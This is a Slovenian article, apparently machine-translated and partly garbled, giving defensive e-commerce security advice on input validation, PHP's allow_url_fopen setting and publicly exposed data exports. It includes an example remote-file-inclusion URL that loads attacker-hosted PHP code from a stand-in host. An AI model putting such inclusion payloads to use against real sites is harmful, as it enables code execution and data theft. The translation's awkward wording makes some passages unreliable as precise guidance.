E-Commerce Security - priklopom Security Holes

Varnost v e-poslovanje spletne strani je treba upoštevati pri razvoju večjih e-poslovanje spletne strani ali programske opreme. Projekta je treba zavedati vseh varnostnih vidikov pri načrtovanju mesta. Z e-trgovina postaja vse bolj običajna teh dneh, število varnostnih napadov je vsekakor narašča. Paranoja je zdrava stvar za razvijalce e-business stran, moramo ohraniti do vrat z varnostnimi vprašanji, in vodijo naša ušesa in oči odprte. Čeprav so naslednje vrzeli resno, če je prisoten po vrzeli so lahko določene.

Spodaj je nekaj varnostnih pomislekov, ki se vključi pri razvoju mesta. Ta člen ne zajema e-kraje v trgovinah, si oglejte moj poseben člen o tem.

Uporabnik input - vsak vnos, pa naj bo vnos količina, iskanje izdelka, ki vstopajo imena itd, je treba potrditi v sumljivih znakov. Če to ni storjeno, je mogoče vstopiti "?>", zapiranje koncu oznake za PHP in izvajanje del kode PHP.

To je daleč varnejše omogočiti številke in črke az (črkami vštet) in 0-9 in nič drugega, kot pa da seznam vseh znakov, ki ne bi smel biti tam. Potrjevanje skript mora pomikanjem vsak lik enega po enega. To je treba doseči z uporabo strežnika na strani potrditve, ne Javascript. Uporaba strani strežnika vstopnega potrjevanje je nujno ohraniti nezaželenih znakov

Obstaja še en velik pri izvajanju PHP kodo. Če uporabljate PHP obstaja nastavitev, imenovano allow_url_fopen, ki omogoča odpiranje datotek iz PHP skript. Ta nastavitev mora biti izklopljen, razen če je to nujno potrebno.

Zamislite si, imaš PHP skript tako za določen glave in noge, ter za dostop do vaše spletne strani, ki bi jih v vrsto http://www.mysite.com/index.php?page=page2. Vse kar potrebujete, je zlonamerno uporabnik teči scenarij s spremembo teh parametrov, ki jih vnesete v "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" z nekaj PHP kode v datoteko "hacker.txt". Lahko bi se kaj zgodilo, PHP files branje, črta, pomembnih informacij ukraden.

Če niste prepričani, če je ta nastavitev vklopljena ali izklopljena, vas prosimo, kopirajte naslednjo kodo PHP v besedilno datoteko in jo prenesite na vaš spletni strežnik:

phpinfo ();
?>

Ko odprete svoj skript na spletni strežnik, morate priti po nastavitev allow_url_fopen po konfiguraciji.

Računalnik uporabnika, v normalnih okoliščinah ne more najti vrednosti te nastavitve.

Bodite previdni, izvoženih podatkov, kot so naročila, izdelke v CSV in mySQL datotek. Če se ta izvozi podatkov iz skripta in se hrani na spletni strežnik pod skupnim imenom datoteke, tj. http://www.mysite.com/admin/output_tables.csv. To je samo res problem, ko izvažajo podatki, prebiva v datoteko v imeniku, ki je javno dostopen. Obstaja dva načina, da se prepreči ta varnostna vrzel - prvič je izhodna datoteka zadaj zaščitena geslo imenik, po drugi strani so podatki, ki se nahajajo znotraj obrazec textarea HTML element na scenarij. Storeowner lahko nato kopirate te podatke iz textfile in ustvarite novo datoteko na svojem računalniku in ga prilepite informacij tukaj.

Vse kar potrebujete, je heker, da bi našli to ime datoteke s preverjanjem iz e-commerce software je demo spletne strani in iščejo isto ime datoteke na pravi strani.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video Kako vztrajati vaš računalnik Secure	Play Video Kako Preverite varnostne nastavitve v operacijskem sistemu Windows Vista

Spodaj so več člankov, povezanih z zgoraj članek iz "Commerce" article kategorijo.

Ljudje se zanimajo za zgoraj članek "E-Commerce Security - priklopom varnostne luknje", so prav tako zanima, povezanih členov, navedenih spodaj: